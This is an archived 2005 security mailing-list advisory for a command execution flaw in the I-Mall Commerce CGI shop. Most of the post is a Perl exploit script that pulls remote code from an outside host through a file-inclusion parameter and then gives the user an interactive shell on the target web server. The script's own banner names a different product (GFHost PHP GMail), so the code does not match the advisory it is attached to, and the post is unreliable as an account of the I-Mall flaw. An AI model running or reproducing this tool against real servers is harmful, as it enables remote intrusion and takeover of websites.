[EXPL] I-Mall Commerce i-mall.cgi Arbitrary Command Execution (Exploit)

From: SecuriTeam (support_at_securiteam.com)
Date: 05/04/05

  • Next message: SecuriTeam: "[NT] Vulnerability in Microsoft Excel Remote Code Execution Technical Details (MS04-033)"
    To: list@securiteam.com
    Date: 4 May 2005 19:08:42 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      I-Mall Commerce i-mall.cgi Arbitrary Command Execution (Exploit)
    ------------------------------------------------------------------------

    SUMMARY

    I-Mall Commerce is "a CGI based online shopping suite in Korean language".
    A remote command execution vulnerability has been discovered in the I-Mall
    CGI Application by ZetaLabs, Zone-H Laboratories. The following exploit
    code can be used to test your system for them mentioned vulnerability.
    This issue occurs due to insufficient filtering of externally supplied
    data to the i-mall.cgi script that allows a remote user to pass an
    arbitrary shell command which will be executed by the script. An attacker
    may exploit this vulnerability to execute commands in the security context
    of the web server hosting the affected script.

    DETAILS

    Exploit:
    ##############################################
    # GFHost explo
    # Spawn bash style Shell with webserver uid
    # Greetz SPAX, foxtwo, Zone-H
    # This Script is currently under development
    ##############################################

    use strict;
    use IO::Socket;
    my $host;
    my $port;
    my $command;
    my $url;
    my @results;
    my $probe;
    my @U;
    $U[1] = "/dl.php?a=0.1&OUR_FILE=ff24404eeac528b".
    "&f=http://utenti.lycos.it/z00/xpl.gif&cmd=";
    &intro;
    &scan;
    &choose;
    &command;
    &exit;
    sub intro {
    &help;
    &host;
    &server;
    sleep 1;
    };
    sub host {
    print "\nHost or IP : ";
    $host=<STDIN>;
    chomp $host;
    if ($host eq ""){$host="127.0.0.1"};
    print "\nPort (enter to accept 80): ";
    $port=<STDIN>;
    chomp $port;
    if ($port =~/\D/ ){$port="80"};
    if ($port eq "" ) {$port = "80"};
    };
    sub server {
    my $X;
    print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
    $probe = "string";
    my $output;
    my $webserver = "something";
    &connect;
    for ($X=0; $X<=10; $X++){
     $output = $results[$X];
     if (defined $output){
     if ($output =~/apache/){ $webserver = "apache" };
     };
    };
    if ($webserver ne "apache"){
    my $choice = "y";
    chomp $choice;
    if ($choice =~/N/i) {&exit};
                }else{
    print "\n\nOK";
     };
    };
    sub scan {
    my $status = "not_vulnerable";
    print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
    my $loop;
    my $output;
    my $flag;
    $command="dir";
    for ($loop=1; $loop < @U; $loop++) {
    $flag = "0";
    $url = $U[$loop];
    $probe = "scan";
    &connect;
    foreach $output (@results){
    if ($output =~ /Directory/) {
                                  $flag = "1";
             $status = "vulnerable";
             };
     };
    if ($flag eq "0") {
    }else{
         };
    };
    if ($status eq "not_vulnerable"){

        };
    };
    sub choose {

    my $choice="1";
    chomp $choice;
    if ($choice > @U){ &choose };
    if ($choice =~/\D/g ){ &choose };
    if ($choice == 0){ &other };
    $url = $U[$choice];
    };
    sub other {
    my $other = <STDIN>;
    chomp $other;
    $U[0] = $other;
    };
    sub command {
    while ($command !~/quit/i) {
    print "[$host]\$ ";
    $command = <STDIN>;
    chomp $command;
    if ($command =~/quit/i) { &exit };
    if ($command =~/url/i) { &choose };
    if ($command =~/scan/i) { &scan };
    if ($command =~/help/i) { &help };
    $command =~ s/\s/+/g;
    $probe = "command";
    if ($command !~/quit|url|scan|help/) {&connect};
    };
    &exit;
    };
    sub connect {
    my $connection = IO::Socket::INET->new (
        Proto => "tcp",
        PeerAddr => "$host",
        PeerPort => "$port",
        ) or die "\nSorry UNABLE TO CONNECT To $host On Port $port.\n";
    $connection -> autoflush(1);
    if ($probe =~/command|scan/){
    print $connection "GET $url$command HTTP/1.1\r\nHost: $host\r\n\r\n";
    }elsif ($probe =~/string/) {
    print $connection "HEAD / HTTP/1.1\r\nHost: $host\r\n\r\n";
    };

    while ( <$connection> ) {
       @results = <$connection>;
        };
    close $connection;
    if ($probe eq "command"){ &output };
    if ($probe eq "string"){ &output };
    };
    sub output{
    my $display;
    if ($probe eq "string") {
       my $X;
       for ($X=0; $X<=10; $X++) {
       $display = $results[$X];
       if (defined $display){print "$display";};
        };
       }else{
       foreach $display (@results){
           print "$display";
        };
                              };
    };
    sub exit{
    print "\n\n\n ORP";
    exit;
    };
    sub help {
    print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
    print "\n
            GFHost PHP GMail
            Command Execution Vulnerability by SPABAM 2004" ;
    print "\n http://www.zone-h.org/advisories/read/id=4904
    ";
    print "\n GFHost.pl Exploit v1.1";
    print "\n \n note.. Script under DEVEL";
    print "\n";
    print "\n Host: www.victim.com or xxx.xxx.xxx.xxx (RETURN for 127.0.0.1)";
    print "\n Command: SCAN URL HELP QUIT";
    print "\n\n\n\n\n\n\n\n\n\n\n";
    };

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:jerome@athias.fr> Jerome
    ATHIAS .
    The original article can be found at:
    <http://www.zone-h.org/advisories/read/id=4904>
    http://www.zone-h.org/advisories/read/id=4904

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[NT] Vulnerability in Microsoft Excel Remote Code Execution Technical Details (MS04-033)"

    Relevant Pages